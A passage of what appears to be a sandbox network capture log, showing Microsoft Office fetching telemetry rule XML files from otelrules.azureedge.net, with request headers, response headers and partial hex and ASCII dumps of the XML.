                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:35 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      91192.168.2.74980313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:34 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:35 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:35 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1395
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                      ETag: "0x8DC582BDE12A98D"
                                                                                                      x-ms-request-id: 03c3f781-101e-000b-56fe-165e5c000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185135Z-1657d5bbd48tnj6wmberkg2xy800000005gg000000008uqx
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:35 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      92192.168.2.74980413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:35 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:35 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:35 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1358
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                      ETag: "0x8DC582BE022ECC5"
                                                                                                      x-ms-request-id: 05ec8595-701e-000d-7443-196de3000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185135Z-1657d5bbd48xjgsr3pyv9u71rc000000019g00000000vx0g
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:35 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      93192.168.2.74980713.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:35 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:36 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:36 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1405
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                      ETag: "0x8DC582BE12B5C71"
                                                                                                      x-ms-request-id: 6f1c5b1d-901e-0048-485a-17b800000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185136Z-1657d5bbd48sdh4cyzadbb374800000005ag000000000s45
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:36 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      94192.168.2.74980513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:35 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:36 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:35 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1389
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                      ETag: "0x8DC582BE10A6BC1"
                                                                                                      x-ms-request-id: 29f28342-e01e-003c-5d00-17c70b000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185135Z-1657d5bbd48cpbzgkvtewk0wu000000005d000000000rpwf
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:36 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      95192.168.2.74980813.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:35 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:36 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:36 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1368
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                      ETag: "0x8DC582BDDC22447"
                                                                                                      x-ms-request-id: 832b36a1-601e-000d-363a-192618000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185136Z-1657d5bbd487nf59mzf5b3gk8n0000000540000000000bfv
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:36 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      96192.168.2.74980913.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:36 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:36 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:36 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1401
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                      ETag: "0x8DC582BE055B528"
                                                                                                      x-ms-request-id: 3a04fc40-501e-007b-3b73-175ba2000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185136Z-1657d5bbd48sdh4cyzadbb3748000000055000000000tmhq
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:36 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      97192.168.2.74981213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:36 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:36 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:36 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1360
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                      ETag: "0x8DC582BDDEB5124"
                                                                                                      x-ms-request-id: 62f7f1ae-f01e-0096-4d0c-1710ef000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185136Z-1657d5bbd48jwrqbupe3ktsx9w00000005pg000000002tfr
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:36 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      98192.168.2.74981013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:36 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:37 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:36 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1364
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                      ETag: "0x8DC582BE1223606"
                                                                                                      x-ms-request-id: 04600955-801e-00ac-55f4-16fd65000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185136Z-1657d5bbd482tlqpvyz9e93p5400000005k0000000001qmp
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:37 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      99192.168.2.74981113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:36 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:37 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:36 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1397
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                      ETag: "0x8DC582BE7262739"
                                                                                                      x-ms-request-id: 4035d6e2-a01e-0002-4602-175074000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185136Z-1657d5bbd487nf59mzf5b3gk8n000000051000000000ct09
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:37 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      100192.168.2.74980613.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:36 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:37 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:36 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1352
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                      ETag: "0x8DC582BE9DEEE28"
                                                                                                      x-ms-request-id: a9a45936-c01e-00a1-54f1-167e4a000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185136Z-1657d5bbd48vlsxxpe15ac3q7n00000005c000000000equ8
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
